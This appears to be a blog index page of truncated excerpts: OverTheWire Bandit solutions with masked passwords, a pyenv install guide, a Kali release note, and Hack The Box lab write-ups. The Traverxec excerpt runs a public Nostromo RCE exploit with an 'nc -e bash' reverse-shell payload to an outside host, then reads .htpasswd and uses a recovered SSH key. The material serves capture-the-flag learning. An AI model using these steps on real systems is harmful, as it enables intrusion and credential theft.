Pages

Search

Bandit CTF – Level 5

level 4 –> 5 bandit4@bandit:~$ ls -la bandit4@bandit:~$ cd inhere/bandit4@bandit:~/inhere$ ls -la bandit4@bandit:~/inhere$ cat ./-file07 password = koReXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 4

level 3 –> 4 bandit3@bandit:~$ ls -la bandit3@bandit:~$ cd inherebandit3@bandit:~/inhere$ ls -la bandit3@bandit:~/inhere$ cat .hidden password = pIwrXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 3

Level 2 –> 3 bandit2@bandit:~$ ls -la bandit2@bandit:~$ cat ./spaces\ in\ this\ filename password = UmHaXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF

Today I start publishing some of the first solutions to the Bandit CTF.http://overthewire.org/wargames/bandit/ In this first post, I’ll publish the first two levels. level 0 –> 1 $ ssh bandit0@bandit.labs.overthewire.org -2220 pass = bandit0 bandit0@bandit:~$ ls bandit0@bandit:~$ cat readme password = boJ9XXXXXXXXXXXXXXXXXXXXXXXXXXXX level 1 –> 2 bandit1@bandit:~$ ls -la bandit1@bandit:~$ cat ./- password level = CV1DXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Pyenv install and ussage

Install $ sudo apt-get install -y build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils tk-dev libffi-dev liblzma-dev python3-openssl git$ curl https://pyenv.run | bash If we are using ZSH then we will now add the proper lines to our .zshrc. $ echo ‘export PYENV_ROOT=»$HOME/.pyenv»‘ >> ~/.zshrc$ echo ‘export PATH=»$PYENV_ROOT/bin:$PATH»‘ >> ~/.zshrc$ echo -e ‘if command -v pyenv 1>/dev/null 2>&1; then\n eval «$(pyenv init -)»\nfi’ >> ~/.zshrc Restart

HTB Heist

$nmap -sC -sV -oA all -vv -p- 10.10.10.149 $gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e $gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php Accessing to http://10.10.10.149/login.php There is a «Login as Guest» option. http://10.10.10.149/issues.php There is an «Attachment» link. http://10.10.10.149/attachments/config.txt The message talks about a Cisco Router. Hazard said to create a user account for him. So it should be a «hazard» username. Testing admin credentials we’ve just found. we need an

Kali Linux 2021.1 Released

The new Kali 2021.1 version has been recently released. The official post can be found here:https://www.kali.org/blog/kali-linux-2021-1-release/ The summary of the news are: Xfce 4.16 – Our preferred and current default desktop environment has been updated and tweaked KDE 5.20 – Plasma also received a version bump Terminals – mate-terminal, terminator and tilix all had various work carried out on them Command Not Found – A helping hand to say if

HTB Traceback

$nmap -A -T4 -p- 10.10.10.181 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 80/tcp open http Apache httpd 2.4.29 Access to http://10.10.10.181 Can we assume that there is a Web-shell in this box? Let’s try to find out. $gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e With our usual wordlist, there aren’t interesting results. Let’s try a different one taking into account the comment of the main site that talked about web-shells… $gobuster dir

HTB Traverxec

$nmap -T4 -A -p- 10.10.10.165 Open ports: 22/tcp open ssh OpenSSH 7.9p1 Debian 80/tcp open http nostromo 1.9.6 Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html) $searchsploit nostromo Our web server is vulnerable to an RCE… 🙂 $searchsploit -m 47837 $python 47837.py 10.10.10.165 80 «nc -e bash 10.10.14.15 1234″$nc -lnvp 1234 whoami python3 -c «import pty;pty.spawn(‘/bin/bash’)» We are www-data, let’s enumerate a little bit. www-data@traverxec:/var/nostromo/conf$ ls -la www-data@traverxec:/var/nostromo/conf$ cat .htpasswd $chmod 600 david.key$ssh -i david.key david@10.10.10.165

HTB Bastion

$nmap -A -p- -T4 10.10.10.134 Open ports: 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp